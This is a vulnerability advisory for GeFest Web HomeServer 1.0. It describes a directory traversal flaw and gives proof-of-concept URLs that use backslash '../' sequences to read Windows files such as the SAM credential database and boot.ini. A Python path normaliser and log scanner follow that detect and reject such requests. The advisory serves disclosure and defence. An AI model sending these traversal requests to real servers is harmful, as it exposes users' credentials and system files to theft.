Product : GeFest Web HomeServer
Version : 1.0
URL : http://clearweb.org.ua/
Platform : Windows
Type of vulnerability : Directory Traversal
Risk rating : High
Issue fixed in version : 1.2
Vulnerability discovered by : MarkoT
0x01 : Vendor description of software
From the vendor website:
"""Gefest Web Home Server is a Simple Web Server with Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""
0x02 : Vulnerability details
By default, the utility runs as an application (and it is very likely that users will run it with administrator privileges).
The discovered vulnerability allows an attacker to retrieve files outside of the web application root by placing directory traversal sequences, using backslash separators, in the requested URL path.
PoC :
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32\\calc.exe
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32\\config\\sam
http://192.168.1.200:8080/\\../\\../\\../WINDOWS\\SYSTEM32
http://192.168.1.200:8080/\\../\\../\\../boot.ini
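The PoC above relies on the server treating backslashes as path separators and not collapsing "../" before mapping the URL to a file. The following is an added example, not code from the advisory or from the GeFest product: a root-relative path normaliser that a web server could use to refuse such requests, together with a small scanner that flags traversal attempts in access-log lines. It goes beyond the PoC in also handling percent-encoded and double-encoded dot segments. The document root and the log lines are constructed for the example; the product's real log format is not shown in the advisory.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed access-log lines in a common-log-like shape (not the product's
# real format). Lines 3 and 4 mimic the advisory's PoC request patterns.
SAMPLE_LOG = [
    r'192.168.1.50 - - "GET /index.html HTTP/1.1" 200',
    r'192.168.1.50 - - "GET /videos/../index.html HTTP/1.1" 200',
    r'192.168.1.77 - - "GET /\\../\\../\\../boot.ini HTTP/1.1" 200',
    r'192.168.1.77 - - "GET /%2e%2e/%2e%2e/WINDOWS/win.ini HTTP/1.1" 200',
]

_REQUEST_RE = re.compile(r'^(\S+) .*"(?:GET|HEAD|POST) (\S+) HTTP/')


def normalize_request_path(url_path: str) -> Optional[str]:
    """Return the root-relative path a request maps to, or None if it escapes.

    Both '/' and '\\' are treated as separators (a Windows file API accepts
    either, which is exactly what the PoC exploits), percent-encoding is
    decoded until it stops changing (catches %2e and %252e), and every
    '..' segment must pop a directory that the request itself pushed.
    """
    # Drop the query string before decoding so an encoded '?' cannot hide a path.
    raw = url_path.split("?", 1)[0]
    decoded = raw
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        return None
    unified = decoded.replace("\\", "/")
    stack: List[str] = []
    for segment in unified.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:
                return None  # attempted climb above the document root
            stack.pop()
            continue
        stack.append(segment)
    return "/".join(stack)


def is_traversal_attempt(url_path: str) -> bool:
    """True when the request would resolve outside the web root."""
    return normalize_request_path(url_path) is None


def find_traversal_requests(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan log lines and return (client_ip, request_path) for traversal attempts."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        match = _REQUEST_RE.match(line)
        if match is None:
            continue
        client_ip, path = match.group(1), match.group(2)
        if is_traversal_attempt(path):
            hits.append((client_ip, path))
    return hits


if __name__ == "__main__":
    for ip, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

The important design choice is that the check works on the normalised, decoded, separator-unified path rather than on a blacklist of "../" substrings: the second sample line contains ".." but stays inside the root and is correctly allowed, while the backslash and percent-encoded variants are rejected because they pop past an empty stack.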